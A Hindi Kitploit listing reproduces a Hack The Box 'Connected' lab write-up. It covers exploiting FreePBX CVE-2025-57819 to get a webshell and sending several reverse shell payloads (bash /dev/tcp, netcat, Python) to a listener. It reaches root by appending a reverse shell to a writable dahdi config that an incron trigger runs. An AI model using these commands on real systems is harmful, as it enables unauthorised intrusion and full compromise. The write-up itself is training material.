Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/diegorivas1/htb-labs-connected
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगवेब एप्लिकेशन शोषणजानकारी एकत्र करनाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
पेलोड डेवलपमेंट
GitHubdiegorivas1/htb-labs-connected

htb-labs-connected

# Hack The Box Connected मशीन राइट-अप जिसमें एन्यूमरेशन, CVE-2025-57819 एक्सप्लॉइटेशन, रिवर्स शेल, और FreePBX तथा incron के माध्यम से रूट तक प्रिविलेज एस्केलेशन शामिल है।

रिपॉजिटरी देखें
18घं 4मि पहलेअभी तक समीक्षित नहीं

HTB: Connected - स्टाफ पिक

English | Español

HTB Difficulty OS Platform

📋 विषय-सूची

  1. एन्यूमरेशन
  2. एक्सप्लॉइटेशन - CVE-2025-57819
  3. रिवर्स शेल
  4. प्रिविलेज एस्केलेशन
  5. फ्लैग्स
  6. रिपॉजिटरी संरचना
  7. उपयोग किए गए स्क्रिप्ट्स और टूल्स
  8. अटैक सारांश
  9. संसाधन और क्रेडिट्स
  10. अतिरिक्त नोट्स

1. एन्यूमरेशन

1.1 Nmap के साथ पोर्ट स्कैनिंग

root@kitploit:~
nmap -sV 10.129.81.130

परिणाम:

root@kitploit:~
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.6 (CentOS) PHP/7.4.16
443/tcp open  ssl/https Apache/2.4.6 (CentOS) PHP/7.4.16

1.2 डोमेन को /etc/hosts में जोड़ें

root@kitploit:~
echo "10.129.81.130 connected.htb" >> /etc/hosts

1.3 Gobuster के साथ डायरेक्टरी फज़िंग

root@kitploit:~
gobuster dir -u http://connected.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

मुख्य निष्कर्ष:

  • /admin - FreePBX एडमिनिस्ट्रेशन पैनल
  • /ucp - यूज़र कंट्रोल पैनल
  • /robots.txt - रोबोट्स फ़ाइल

2. एक्सप्लॉइटेशन - CVE-2025-57819

2.1 एक्सप्लॉइट डाउनलोड करें

WatchTowr Labs रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819.git
cd watchTowr-vs-FreePBX-CVE-2025-57819

2.2 एक्सप्लॉइट चलाएं

root@kitploit:~
python3 watchTowr-vs-FreePBX-CVE-2025-57819.py -H http://connected.htb

अपेक्षित आउटपुट:

root@kitploit:~
[+] FreePBX CVE-2025-57819 Detection Artifact Generator started
[+] Sending exploit request
[+] Waiting 2 minutes for DAG script to be created
[+] VULNERABLE - webshell found: http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=hostname

2.3 वेबशेल सत्यापित करें

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=whoami"

परिणाम:

root@kitploit:~
asterisk

3. रिवर्स शेल

3.1 Kali पर लिसनर शुरू करें

root@kitploit:~
nc -lvnp 4444

3.2 रिवर्स शेल इंजेक्ट करें

एन्कोडेड संस्करण:

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.234%2F4444%200%3E%261%27"

नोट: 10.10.14.234 को अपने VPN IP से बदलें।

3.3 विकल्प

Netcat

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=nc%20-e%20/bin/bash%2010.10.14.234%204444"

Python

root@kitploit:~
curl "http://connected.htb/this-is-an-ioc-not-actually-watchTowr-8jxir4tsm6.php?cmd=python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.14.234%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bsubprocess.call([%22/bin/bash%22%2C%22-i%22])%27"

3.4 प्राप्त शेल

root@kitploit:~
listening on [any] 4444 ...
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 55944
bash: no job control in this shell
[asterisk@connected html]$

4. प्रिविलेज एस्केलेशन

4.1 राइटेबल कॉन्फ़िगरेशन फ़ाइलें खोजें

root@kitploit:~
find /etc -name "*.conf" -writable 2>/dev/null

मुख्य परिणाम:

root@kitploit:~
/etc/dahdi/init.conf

4.2 incron.d जांचें

root@kitploit:~
cat /etc/incron.d/*

प्रासंगिक एंट्री:

root@kitploit:~
/var/spool/asterisk/sysadmin/dahdi_restart IN_CLOSE_WRITE /usr/sbin/sysadmin_dahdi_restart

4.3 init.conf में रिवर्स शेल जोड़ें

root@kitploit:~
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.234/4545 0>&1"' >> /etc/dahdi/init.conf

4.4 रूट शेल लिसनर शुरू करें

root@kitploit:~
nc -lvnp 4545

4.5 सर्विस रीस्टार्ट ट्रिगर करें

root@kitploit:~
echo "Restart" >> /var/spool/asterisk/sysadmin/dahdi_restart

4.6 रूट शेल प्राप्त हुआ

root@kitploit:~
connect to [10.10.14.234] from (UNKNOWN) [10.129.81.130] 45996
bash: no job control in this shell
[root@connected /]#

4.7 रूट एक्सेस सत्यापित करें

root@kitploit:~
whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

5. फ्लैग्स

5.1 यूज़र फ्लैग

root@kitploit:~
cat /home/asterisk/user.txt
root@kitploit:~
HTB{...user_flag...}

5.2 रूट फ्लैग

root@kitploit:~
cat /root/root.txt
root@kitploit:~
HTB{...root_flag...}

फ्लैग्स जानबूझकर इस रिपॉजिटरी से हटाए गए हैं।


6. रिपॉजिटरी संरचना

root@kitploit:~
htb-labs-connected/
├── README.md
├── README-ES.md
├── exploits/
│   ├── watchTowr-vs-FreePBX-CVE-2025-57819/
│   ├── CVE-2025-57819-exploit/
│   └── CVE-2025-57819-poc/
├── payloads/
│   └── reverse_shell.sh
├── scans/
│   ├── nmap_scan.txt
│   └── gobuster_results.txt
├── screenshots/
└── flags/

7. उपयोग किए गए स्क्रिप्ट्स और टूल्स

7.1 रिवर्स शेल स्क्रिप्ट

फ़ाइल: payloads/reverse_shell.sh

root@kitploit:~
#!/bin/bash

# Reverse shell for HTB Connected
# Usage: ./reverse_shell.sh 10.10.14.234 4444

IP=$1
PORT=$2

if [ -z "$IP" ] || [ -z "$PORT" ]; then
    echo "Usage: $0 <IP> <PORT>"
    exit 1
fi

bash -c "bash -i >& /dev/tcp/$IP/$PORT 0>&1"

7.2 एन्यूमरेशन कमांड्स

फ़ाइल: scans/nmap_scan.txt

root@kitploit:~
# Full port scan
nmap -sV -p- -T4 10.129.81.130

# Service and default script scan
nmap -sC -sV -p22,80,443 10.129.81.130

7.3 फज़िंग कमांड्स

फ़ाइल: scans/gobuster_results.txt

root@kitploit:~
# Directory fuzzing
gobuster dir \
    -u http://connected.htb \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html

# Fuzzing the admin directory
gobuster dir \
    -u http://connected.htb/admin \
    -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
    -x php,txt,html,conf,ini,bak

8. अटैक सारांश


9. संसाधन और क्रेडिट्स

  • मूल राइटअप: CyberSaif
  • WatchTowr Labs एक्सप्लॉइट: GitHub
  • CVE-2025-57819: SentinelOne
  • FreePBX सुरक्षा सलाहकार: GitHub

10. अतिरिक्त नोट्स

10.1 यदि वेबशेल नहीं बनती है

  • पूरे दो मिनट प्रतीक्षा करें; एक्सप्लॉइट को आर्टिफैक्ट बनाने के लिए समय चाहिए।
  • कनेक्टिविटी सत्यापित करें:
root@kitploit:~
curl -k https://connected.htb

10.2 यदि लिसनर काम नहीं करता है

अपना VPN इंटरफ़ेस जांचें:

root@kitploit:~
ip addr show tun0

यदि आवश्यक हो तो दूसरा लिसनिंग पोर्ट आज़माएं:

root@kitploit:~
4445
8080
1234

10.3 टार्गेट पर मुख्य फ़ाइलें

  • /etc/dahdi/init.conf - प्रिविलेज एस्केलेशन के दौरान उपयोग की गई राइटेबल कॉन्फ़िगरेशन फ़ाइल
  • /etc/incron.d/ - incron कॉन्फ़िगरेशन डायरेक्टरी
  • /var/spool/asterisk/sysadmin/dahdi_restart - रीस्टार्ट क्रिया निष्पादित करने के लिए उपयोग किया जाने वाला ट्रिगर
  • /var/www/html/ - वेब सर्वर डॉक्यूमेंट रूट

🏁 निष्कर्ष

Connected सफलतापूर्वक पूरा हो गया। ✅

अटैक चेन दर्शाती है कि कैसे एक एक्सपोज़्ड FreePBX इंस्टेंस CVE-2025-57819 के माध्यम से प्रारंभिक एक्सेस की ओर ले जा सकता है, उसके बाद एक राइटेबल कॉन्फ़िगरेशन फ़ाइल और एक incron-आधारित ट्रिगर के माध्यम से प्रिविलेज एस्केलेशन होता है।

टूल डाउनलोड करें
चरणक्रियापरिणाम
1Nmapपोर्ट 22, 80, और 443 खुले हैं
2Gobuster/admin, /ucp, /robots.txt खोजे गए
3CVE-2025-57819asterisk के रूप में वेबशेल
4रिवर्स शेलasterisk के रूप में इंटरैक्टिव शेल
5प्रिविलेज एस्केलेशनincron.d → dahdi_restart → init.conf
6रूटरूट शेल प्राप्त हुआ